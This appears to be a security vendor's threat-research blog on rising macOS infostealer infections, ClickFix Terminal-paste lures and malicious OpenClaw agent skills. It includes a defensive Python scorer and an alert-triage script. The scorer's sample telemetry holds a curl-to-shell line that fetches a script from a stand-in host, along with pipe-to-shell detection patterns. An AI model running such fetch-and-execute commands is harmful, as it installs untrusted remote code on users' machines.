The macOS Infostealer Explosion
While Windows infostealer activity declined 30% year-over-year, macOS infections exploded by 3,276%. The "Macs are secure" assumption is dead.
Whiteintel Team
Threat Research
WhiteIntel's threat intelligence platform tracks credential exposure across underground marketplaces, infostealer logs, and combolist networks. Between Q1 2025 and Q1 2026, we observed a dramatic shift in the infostealer landscape — one that challenges long-held assumptions about macOS security.
These figures represent deduplicated, unique credential exposures indexed by WhiteIntel's database engine — not raw marketplace listings or unverified data. Each log corresponds to a distinct macOS device infection where credentials, session tokens, and sensitive data were harvested and sold on underground markets.
Windows infections declined. macOS infections surged by over 3,000%. What changed?
Why macOS Became a Target
For years, the security community repeated a comfortable narrative: "Macs don't get malware." The assumption relied on market share (fewer targets), UNIX-based security (more secure by design), and Apple's control over the ecosystem (harder to compromise).
That narrative is becoming obsolete.
The Target Profile Shifted
macOS users disproportionately represent high-value targets: developers with access to corporate repositories and cloud infrastructure, cryptocurrency traders managing substantial holdings, creative professionals with client data and intellectual property, and executives using personal MacBooks for corporate access.
Atomic Stealer (AMOS), the most prevalent macOS infostealer, specifically targets cryptocurrency wallets alongside traditional credentials. According to Trend Micro's February 2026 analysis, AMOS exfiltrates Apple and KeePass keychains, browser credentials, cloud service tokens, and extensive user documents.
The average macOS infostealer log contains higher-value credentials than typical Windows logs. Developers store AWS keys, GitHub tokens, SSH private keys, and API credentials on development machines. Cryptocurrency users maintain wallet files and seed phrases. Corporate users save VPN configurations and cloud service access.
M1/M2 Adoption in Enterprise
Apple Silicon's enterprise adoption accelerated. Organizations standardized on M1 and M2 MacBooks for development teams, executives, and remote workers — creating concentrated pools of high-value corporate access on macOS devices.
According to Kaspersky's security audit in January 2026, OpenClaw infections specifically targeted Apple ecosystem users, many running the platform on Mac mini stacks. The concentration of technical users on Apple hardware made macOS an increasingly attractive target.
The Distribution Methods Evolved
Traditional macOS malware relied on social engineering users into manually installing malicious applications. Gatekeeper and XProtect provided reasonable protection against straightforward attacks.
Modern macOS infostealers don't fight these protections — instead, they bypass them entirely through user-assisted execution.
ClickFix: Social Engineering Defeats Security Controls
ClickFix emerged as the primary macOS infection vector. The technique tricks users into executing malicious commands through Terminal by presenting fake error messages or verification prompts.
According to ESET research published in June 2025, ClickFix attacks surged 517% in the first half of 2025, accounting for nearly 8% of all blocked attacks. By late 2025, campaigns had specifically adapted for macOS users.
How ClickFix Works on macOS
1. User visits a compromised or malicious website
2. Page displays a fake error impersonating a legitimate service (ChatGPT, trading platform, software verification)
3. Error claims the user needs to 'verify' or 'fix' an issue by running a Terminal command
4. User is instructed: press ⌘+Space, type Terminal, then paste the provided command
5. The command is a malicious Base64-encoded script — directly executed by the user
6. No Gatekeeper check. No signature scan. The system sees intentional user action.
Microsoft documented a June 2025 ClickFix campaign targeting macOS users to deliver Atomic macOS Stealer. The campaign impersonated Spectrum (a US cable/internet provider) and redirected users to ClickFix-themed delivery websites with fake CAPTCHA verification.
Why It Bypasses macOS Security
Gatekeeper and XProtect scan downloaded applications for malware signatures. ClickFix doesn't download traditional applications. The malicious code executes directly through Terminal after the user manually pastes and runs it. From the system's perspective, the user intentionally executed a command. No quarantine. No signature check. No security prompt beyond the standard Terminal permission that users regularly approve.
According to Datadog Security Labs analysis published February 2026, attackers created fake GitHub repositories impersonating software companies, leveraging ClickFix as the initial access technique. These repositories lacked actual application code — only READMEs with download links leading to redirect chains ending at ClickFix pages. Campaigns used SEO poisoning to rank malicious links prominently in search results.
Intego documented a "Matryoshka" ClickFix variant in January 2026 using typosquatting. Users mistyping software review sites landed on pages serving ClickFix prompts. The pasted command retrieved shell scripts containing encoded payloads that unpacked at runtime.
OpenClaw: Supply Chain Attacks Through AI Agents
OpenClaw (originally Clawdbot, briefly Moltbot) launched in late 2025 as an autonomous AI agent for macOS. Users could extend functionality through "skills" — modular plugins distributed via ClawHub and other repositories.
By February 2026, this skill ecosystem became a malware distribution network.
The Attack Flow
1. User discovers an OpenClaw skill for desired functionality
2. Skill's README contains a "Prerequisites" section
3. Prerequisites instruct user to download and run "required dependencies"
4. Links lead to malicious infrastructure serving Atomic Stealer
Scale of the Campaign
- 2,200+ malicious skills identified on GitHub (Trend Micro, Feb 2026)
- 341 skills tied to a single "ClawHavoc" operation
- 17% of reviewed OpenClaw skills showed malicious intent (Bitdefender)
- 512 vulnerabilities identified in OpenClaw, 8 classified critical (Kaspersky)
Real-World Incident
Huntress documented fake OpenClaw installers on GitHub deploying both AMOS for macOS and Windows infostealers, using a novel packer called Stealth Packer. The campaign broadly targeted users attempting to install OpenClaw between February 2nd and 10th, 2026. 1Password's security analysis noted: "if you're the kind of person installing agent skills, you are exactly the kind of person whose machine is worth stealing from."
What Gets Stolen from macOS
Modern macOS infostealers target high-value data well beyond basic browser credentials.
| Data Category | What Gets Exfiltrated | Impact |
|---|---|---|
| Cryptocurrency Wallets | MetaMask, Phantom, Coinbase extensions, desktop wallet files, seed phrases, private keys | Immediate and irreversible financial loss |
| Developer Credentials | SSH private keys, AWS access keys, GitHub tokens, API credentials, cloud service tokens | Full corporate infrastructure exposure |
| Browser Data | Saved passwords, active session cookies, autofill data, credit card info | MFA bypass via session token reuse |
| macOS Keychain | Certificates, encryption keys, email/cloud/VPN credentials for all apps | Complete account ecosystem compromise |
| Application Credentials | Email clients, messaging apps, FTP configs, cloud storage tokens | Lateral movement and data exfiltration |
The average macOS infostealer log, according to WhiteIntel's analysis, contains credentials for multiple high-value services. A single infection can expose corporate infrastructure access, personal cryptocurrency holdings, and development environment credentials simultaneously.
The Detection Problem
Traditional endpoint protection struggles with user-assisted execution. When a user manually pastes and runs a Terminal command, the system sees intentional user action. EDR logs the execution, but the command appears as user-initiated activity.
Sophos noted in December 2025 that even with endpoint protection configured, detection often occurs only when an OpenClaw skill attempts to write retrieved payloads to disk. ClickFix execution that stays in-memory evades file-based detection entirely.
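The ClickFix steps above and the detection problem described here share one defensive lesson: the parent process being a user's Terminal says nothing about intent, so detection has to look at the command line itself. The following is an added example, not WhiteIntel's or any EDR vendor's detection content; it scores constructed process-execution events (the field names pid, parent, user and cmdline and the trait weights are assumptions) for the combination of traits a paste-and-run lure typically carries, while letting a lone base64 decode of a local file pass.

```python
"""Score Terminal-spawned commands for paste-and-run (ClickFix-style) traits.

Added example, not WhiteIntel's or any vendor's detection content. It runs
over a constructed list of process-execution events shaped like a generic
EDR/osquery process feed (fields pid, parent, user, cmdline are assumed).
"""
import re

# Heuristics (assumed weights): each regex names one trait of a pasted lure.
# None of these is malicious alone; the combination is what stands out.
TRAITS = [
    ("base64_decode", 2, re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("pipe_to_shell", 3, re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")),
    ("remote_fetch", 1, re.compile(r"\b(?:curl|wget)\b")),
    ("inline_eval", 2, re.compile(r"\beval\b")),
    ("background_detach", 1, re.compile(r"\bnohup\b|&\s*$|\bdisown\b")),
]
INTERACTIVE_TERMINALS = {"Terminal", "iTerm2"}
FLAG_THRESHOLD = 4

SAMPLE_EVENTS = [  # constructed telemetry, not real captures
    {"pid": 4211, "parent": "Terminal", "user": "alice", "cmdline": "ls -la ~/Projects"},
    {"pid": 4230, "parent": "Terminal", "user": "alice",
     "cmdline": "echo aGVsbG8gd29ybGQ= | base64 -d | bash"},
    {"pid": 4301, "parent": "Terminal", "user": "bob",
     "cmdline": "curl -fsSL https://updates.example.invalid/setup.sh | sh"},
    {"pid": 4402, "parent": "iTerm2", "user": "carol", "cmdline": "git pull --rebase"},
    {"pid": 4511, "parent": "Terminal", "user": "dave",
     "cmdline": "base64 -d ~/notes.b64 > notes.txt"},
]


def score_event(event):
    """Return (score, matched trait names) for one process event."""
    score, reasons = 0, []
    cmd = event.get("cmdline", "")
    for name, weight, pattern in TRAITS:
        if pattern.search(cmd):
            score += weight
            reasons.append(name)
    # The text's point: an interactive terminal parent does not make the
    # command benign, so it raises rather than lowers the score.
    if event.get("parent") in INTERACTIVE_TERMINALS:
        score += 1
        reasons.append("interactive_terminal_parent")
    return score, reasons


def flag_events(events, threshold=FLAG_THRESHOLD):
    """Return the events at or above threshold, highest score first."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({"pid": ev["pid"], "user": ev["user"],
                            "score": score, "reasons": reasons})
    return sorted(flagged, key=lambda f: -f["score"])


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(f"pid {hit['pid']} ({hit['user']}): score {hit['score']} "
              f"-> {', '.join(hit['reasons'])}")
```

On the constructed events, the two pasted lures (pids 4230 and 4301) are flagged and the local `base64 -d` of a notes file is not; in practice the weights would be tuned against the organization's own baseline of developer command lines, and the feed would be whatever process telemetry the EDR already collects on managed Macs.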
The Visibility Gap
Corporate security tools monitor managed devices. An employee running AMOS on a personal MacBook used for VPN access remains completely invisible to corporate EDR, SIEM, and network monitoring. The infection happens outside your visibility. The impact lands directly inside your organization.
The WhiteIntel Visibility Advantage
When macOS devices get infected and credentials are harvested, traditional security tools often miss the compromise entirely. The infection happens on personal devices. The execution appears user-initiated. No corporate infrastructure is touched.
But those credentials end up somewhere visible: underground marketplaces.
WhiteIntel tracks macOS-specific infostealer logs across Russian Market, 2easy, Telegram channels, and direct marketplace feeds. When employee credentials from corporate domains appear in fresh macOS stealer logs, organizations receive alerts within 24–48 hours. The 3,276% increase observed between Q1 2025 and Q1 2026 came from monitoring these sources in real time. Traditional breach notification would discover these compromises months later, if at all.
When WhiteIntel detects corporate credentials in a macOS infostealer log, security teams receive actionable intelligence: the infection is recent (typically within 48 hours of marketplace listing), the credentials are current and likely still valid, the log may contain active session tokens requiring immediate invalidation, and the compromised device is identified as a Mac — informing investigation and remediation scope.
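To make the response side of this concrete, here is an added example of how a security team might triage one such alert: it is not WhiteIntel's platform code, and the alert layout (`listed_at`, credential lines in a `url|username|secret` form, a list of cookie hosts), the corporate domain list, the service classification and every sample value are constructed assumptions. It deduplicates repeated listings, keeps only credentials tied to the organization by URL host or e-mail domain, checks the listing age against the 48-hour window, and orders actions so that session invalidation comes before key rotation and password resets.

```python
"""Triage one macOS stealer-log alert against a list of corporate domains.

Added example, not WhiteIntel's platform code. The alert layout (listed_at,
os, credentials as "url|username|secret" lines, cookie hosts), the corporate
domain list and every sample value are constructed for illustration.
"""
from datetime import datetime
from urllib.parse import urlparse

CORPORATE_DOMAINS = {"example.com"}  # assumed
# Hosts whose credentials are tokens/keys rather than passwords (assumed list)
DEV_CLOUD_HOSTS = {"github.com", "console.aws.amazon.com", "signin.aws.amazon.com"}
ALERT_WINDOW_HOURS = 48  # the response window the text refers to

SAMPLE_ALERT = {  # constructed, no real data
    "listed_at": "2026-02-09T14:00:00Z",
    "os": "macOS 15.3",
    "hostname": "alices-macbook-pro",
    "credentials": [
        "https://github.com/login|alice@example.com|<redacted>",
        "https://github.com/login|alice@example.com|<redacted>",  # duplicate line
        "https://vpn.example.com/|alice|<redacted>",
        "https://console.aws.amazon.com/|alice@example.com|<redacted>",
        "https://webmail.personal-isp.test|alice.home@personal-isp.test|<redacted>",
    ],
    "cookies": ["sso.example.com", "github.com"],
}


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _in_domains(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def corporate_credentials(alert, domains):
    """Deduplicated (host, user) pairs tied to the organization by URL host or e-mail domain."""
    seen, out = set(), []
    for line in alert["credentials"]:
        url, user, _secret = line.split("|", 2)  # the secret itself is never surfaced
        host = _host(url)
        mail_domain = user.rsplit("@", 1)[1].lower() if "@" in user else ""
        if not (_in_domains(host, domains) or mail_domain in domains):
            continue
        key = (host, user.lower())
        if key not in seen:
            seen.add(key)
            out.append({"host": host, "user": user})
    return out


def hours_since_listing(alert, now_iso):
    """Age of the marketplace listing in hours; both timestamps are ISO 8601 UTC."""
    listed = datetime.fromisoformat(alert["listed_at"].replace("Z", "+00:00"))
    now = datetime.fromisoformat(now_iso.replace("Z", "+00:00"))
    return (now - listed).total_seconds() / 3600


def remediation_plan(alert, domains, now_iso):
    """Prioritised actions: sessions first (they sidestep MFA), then keys, then passwords."""
    actions = []
    session_hosts = [h for h in alert.get("cookies", [])
                     if _in_domains(h, domains) or h in DEV_CLOUD_HOSTS]
    if session_hosts:
        actions.append({"priority": 0, "action": "invalidate active sessions",
                        "targets": session_hosts})
    for cred in corporate_credentials(alert, domains):
        target = f"{cred['user']} on {cred['host']}"
        if cred["host"] in DEV_CLOUD_HOSTS:
            actions.append({"priority": 1, "action": "rotate tokens/keys and review audit log",
                            "targets": [target]})
        else:
            actions.append({"priority": 2, "action": "force password reset and MFA re-enrolment",
                            "targets": [target]})
    age = hours_since_listing(alert, now_iso)
    return {
        "device": f"{alert['hostname']} ({alert['os']})",
        "age_hours": round(age, 1),
        "in_window": age <= ALERT_WINDOW_HOURS,
        "actions": sorted(actions, key=lambda a: a["priority"]),
    }


if __name__ == "__main__":
    plan = remediation_plan(SAMPLE_ALERT, CORPORATE_DOMAINS, "2026-02-10T12:00:00Z")
    print(plan["device"], f"listed {plan['age_hours']}h ago, in window: {plan['in_window']}")
    for a in plan["actions"]:
        print(f"P{a['priority']} {a['action']}: {', '.join(a['targets'])}")
```

On the constructed alert, the personal webmail entry is dropped, the duplicated GitHub line collapses to one credential, and the plan lists session invalidation for the SSO and GitHub cookies ahead of the AWS and GitHub token rotations and the VPN password reset. The `in_window` flag is what distinguishes a listing still inside the 48-hour response window from an older one, where the same actions apply but the assumption that the credentials are unused no longer holds.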
The Trend Trajectory
The 33.8x growth in macOS infections year-over-year indicates this isn't a temporary spike. Attack methods evolved specifically for macOS — ClickFix Terminal workflows, OpenClaw supply chain attacks. Target profiles shifted toward high-value macOS users. Distribution networks adapted through fake GitHub repositories, poisoned search results, and malicious agent skills.
Organizations can't assume macOS devices are immune. Employees use personal MacBooks for corporate access. Developers run unvetted code from public repositories. Technical users install AI agents and community plugins without security review.
Security teams can't prevent every infection on devices they don't control. But they can monitor when credentials from those infections surface on marketplaces — and respond within the 48-hour window before exploitation occurs.
The "Macs are secure" narrative is dead. The question is whether your monitoring adapted to the new reality. WhiteIntel's macOS-aware credential monitoring extends visibility to the exposures your endpoint tools can't see — because in 2026, the devices outside your control are the ones that matter most.
To learn more about monitoring macOS credential exposure and infostealer activity, explore our solutions at whiteintel.io.